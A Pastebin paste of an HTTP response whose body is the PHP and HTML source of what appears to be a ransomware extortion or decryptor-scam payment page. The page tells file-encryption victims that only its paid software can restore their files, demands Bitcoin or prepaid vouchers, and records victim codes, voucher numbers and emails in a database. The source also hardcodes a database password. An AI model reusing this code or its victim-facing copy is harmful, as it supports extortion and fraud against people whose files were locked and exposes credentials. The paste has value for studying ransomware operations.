API tools faq
paste
Advertisement
Guest User

myeah

a guest
Dec 20th, 2013
2,419
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.60 KB | None | 0 0
raw download clone embed print report
  1. HTTP/1.1 200 OK
  2. Server: nginx/1.2.1
  3. Date: Fri, 20 Dec 2013 23:07:12 GMT
  4. Content-Type: application/octet-stream
  5. Content-Length: 6415
  6. Last-Modified: Fri, 20 Dec 2013 08:49:13 GMT
  7. Connection: keep-alive
  8. Accept-Ranges: bytes
  9.  
  10. <?php
  11. session_start();
  12. define('DBHOST', 'localhost');
  13. define('DBUSER', 'site');
  14. define('DBPASS', 'Be6mybCWhpFpgG4u');
  15. define('DBNAME', 'site');
  16. mysql_connect(DBHOST, DBUSER, DBPASS);
  17. mysql_select_db(DBNAME);
  18. $errors = "";
  19. if(isset($_GET['captcha']) && $_GET['captcha'] == 1){
  20. include('kcaptcha6791/kcaptcha.php');
  21. $captcha = new KCAPTCHA();
  22. if($_REQUEST[session_name()]){
  23. $_SESSION['captcha_keystring'] = $captcha->getKeyString();
  24. }
  25. exit();
  26. }
  27. if(isset($_POST['code']) && (isset($_POST['purse']) || isset($_POST['moneypack']) || isset($_POST['paysafecard']) || isset($_POST['ukash'])) && isset($_POST['email']) && isset($_POST['keystring'])){
  28. if(isset($_SESSION['captcha_keystring']) && $_SESSION['captcha_keystring'] != $_POST['keystring']){
  29. $errors .= 'Incorrect Captcha<br />';
  30. }
  31. if(!preg_match('/^([a-f0-9]){8}-([a-f0-9]){8}$/i',$_POST['code'])){
  32. $errors .= 'Incorrect Code<br />';
  33. }
  34. $query = '';
  35. if(isset($_POST['purse']) && !preg_match('/^([a-z0-9]){34}$/i',$_POST['purse'])){
  36. $errors .= 'Incorrect Purse<br />';
  37. }
  38. if(isset($_POST['moneypack']) && !preg_match('/^([0-9]){14}$/i',$_POST['moneypack'])){
  39. $errors .= 'Incorrect MoneyPack<br />';
  40. }
  41. if(isset($_POST['paysafecard']) && !preg_match('/^([0-9]){16}$/i',$_POST['paysafecard'])){
  42. $errors .= 'Incorrect PaySafeCard<br />';
  43. }
  44. if(isset($_POST['ukash']) && !preg_match('/^([0-9]){19}$/i',$_POST['ukash'])){
  45. $errors .= 'Incorrect Ukash<br />';
  46. }
  47. if (!filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
  48. $errors .= 'Incorrect Email<br />';
  49. }
  50. if(!$errors){
  51. if(isset($_POST['purse'])){
  52. $purse = $_POST['purse'];
  53. $type = 0;
  54. }else if(isset($_POST['moneypack'])){
  55. $purse = $_POST['moneypack'];
  56. $type = 1;
  57. }else if(isset($_POST['paysafecard'])){
  58. $purse = $_POST['paysafecard'];
  59. $type = 2;
  60. }else if(isset($_POST['ukash'])){
  61. $purse = $_POST['ukash'];
  62. $type = 3;
  63. }else{
  64. exit();
  65. }
  66. mysql_query('INSERT INTO `codes` SET `time`='.time().', `type`='.$type.', `purse`="'.mysql_real_escape_string($purse).'", `code`="'.strtoupper(mysql_real_escape_string($_POST['code'])).'", `email`="'.mysql_real_escape_string($_POST['email']).'"');
  67. if(($error = mysql_error()) && preg_match('/Duplicate entry(.*)for key \'purse\'/', $error)){
  68. $errors .= 'Purse already exists';
  69. }else{
  70. $errors = 'You request was send';
  71. }
  72. }
  73. }
  74. $purse = mysql_query('SELECT `purse` FROM `codes` WHERE `code`="admin" ORDER BY RAND() LIMIT 1');
  75. ?>
  76. <!DOCTYPE html><html><head><title>index</title></head><body style="margin:20px">
  77. <p>
  78. In recent time new ransomware attack computers running Windows. When activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware's control servers. <a href="http://www.shadowexplorer.com/downloads.html">Shadowexplorer</a>, <a href="http://media.kaspersky.com/utilities/VirusUtilities/RU/rakhnidecryptor.exe">RakhniDecryptor.exe</a> and <a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rectordecryptor.exe">RectorDecryptor.exe</a> can't restore this files.
  79. <p>Victims think that files are irretrievably lost. We hasten to inform you that this is not so.
  80. <p> We are loud and proud to present you our unique software, which is able to decrypt all your files without prejudice .
  81. <p> We accept only Bitcoin. Before 2014 our software costs 0.1BTC<p>
  82. <b>We will send a program to decrypt only after payment is received</b><p>*IF YOU MADE A PAYMENT BUT STILL DO NOT RECEIVE UNCRYPTOR, PLEASE FILL UP A FORM AGAIN<hr>
  83. <div style="float:left;padding:15px;<?php echo !isset($_GET['pay'])?'border:#333 1px solid':''?>"><a href="index.php">Pay by Bitcoin (BTC)</a></div>
  84. <div style="clear:both;margin-bottom:10px"></div><p><hr>
  85. <div id="errors" style="color:red"><?php echo $errors?></div>
  86. <form action="index.php<?php echo isset($_GET['pay'])?'?pay='.$_GET['pay']:''?>" method="post">
  87. <table cellspacing="3" cellpadding="3">
  88. <tr><td>Code:</td><td><input type="text" name="code" style="width:200px"></td></tr>
  89. <?php if(!isset($_GET['pay'])):?>
  90. <tr><td>Your purse:</td><td><input type="text" name="purse" style="width:200px"></td></tr>
  91. <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'moneypack'):?>
  92. <tr><td>Moneypak:</td><td><input type="text" name="moneypack" style="width:200px"></td></tr>
  93. <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'paysafecard'):?>
  94. <tr><td>PaySafeCard:</td><td><input type="text" name="paysafecard" style="width:200px"></td></tr>
  95. <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'ukash'):?>
  96. <tr><td>Ukash:</td><td><input type="text" name="ukash" style="width:200px"></td></tr>
  97. <?php endif;?>
  98. <tr><td>Email:</td><td><input type="text" name="email" style="width:200px"></td></tr>
  99. <tr><td>Captcha:</td><td><input type="text" name="keystring" style="width:100px;margin-top:30px;margin-right:10px;float:left"> <img style="width:160px;height:80px;float:left" alt="Captcha" src="?captcha=1&<?php echo session_name()?>=<?php echo session_id()?>&rand=<?php echo rand(100000,999999)?>"></td></tr>
  100. <tr><td></td><td><input type="submit" value="Send"></td></tr>
  101. <tr><td>&nbsp;</td></tr>
  102. <?php if(!isset($_GET['pay'])):?>
  103. <tr><td></td><td></td></tr><p>
  104. Our purse:<b><?php echo ($purse && mysql_num_rows($purse))?mysql_result($purse,0,'purse'):''?></b><p>
  105. You can read how to buy bitcoin <a href="https://localbitcoins.com/buy_bitcoins">here</a> and <a href="http://bitcoin.org/en/getting-started/">here</a>
  106. <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'moneypack'):?></td></tr><p>
  107. <tr><td colspan="2">You can read about how to buy moneypak <a href="http://moneypak.com">here</a>
  108. <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'paysafecard'):?></td></tr>
  109. <tr><td colspan="2">You can read about how to buy Paysafecard <a href="http://paysafecard.com">here</a>
  110. </td></tr>
  111. <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'ukash'):?></td></tr>
  112. <tr><td colspan="2">You can read about how to buy ukash <a href="http://ukash.com">here</a>
  113. </td></tr>
  114. <?php endif;?>
  115. </table>
  116. </form>
  117. <!-- hitwebcounter Code START -->
  118. <a href="http://www.hitwebcounter.com/" target="_blank">
  119. <img src="http://hitwebcounter.com/counter/counter.php?page=5220583&style=0008&nbdigits=5&type=ip&initCount=0" title="cute web counter" Alt="cute web counter" border="0" >
  120. </a><br/>
  121. *Our software don't working with Cryptolocker.<p>
  122. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!